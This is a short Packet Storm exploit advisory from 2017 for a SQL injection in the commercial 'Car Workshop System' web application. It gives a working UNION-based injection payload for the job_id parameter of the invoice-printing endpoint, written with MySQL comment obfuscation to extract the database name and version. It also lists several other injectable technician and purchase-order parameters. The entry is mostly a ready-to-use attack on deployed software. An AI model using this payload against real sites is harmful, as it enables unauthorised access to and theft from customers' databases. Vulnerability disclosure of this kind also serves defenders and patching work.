Car Workshop System SQL Injection

2017-03-13T00:00:00
ID PACKETSTORM:141607
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-03-13T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: Car Workshop System - SQL Injection  
# Google Dork: N/A  
# Date: 13.03.2017  
# Vendor Homepage: http://prosoft-apps.com/  
# Software: https://codecanyon.net/item/car-workshop-system/19562074  
# Demo: http://workshop.prosoft-apps.com/  
# Version: N/A  
# Tested on: Win7 x64, Kali Linux x64  
# # # # #   
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Mail: ihsan[@]ihsan[.]net  
# # # # #  
# SQL Injection/Exploit :  
# http://localhost/[PATH]/services/print_service_invoice?job_id=[SQL]  
# 6'+/*!50000union*/+select+1,2,3,/*!50000concat*/(database(),0x7e,version()),5,6,7,8,9,10,11,12--+-  
#   
# In addition.  
# Technician User, There are security vulnerabilities.  
# purchase_order/deletePO?id=  
# technician_services/tech_opened_services_view?job_id=  
# technician_services/tech_drew_out_inventory_services_view?job_id=  
# technician_services/tech_completed_services_view?job_id=  
# Etc..  
# # # # #  
  
`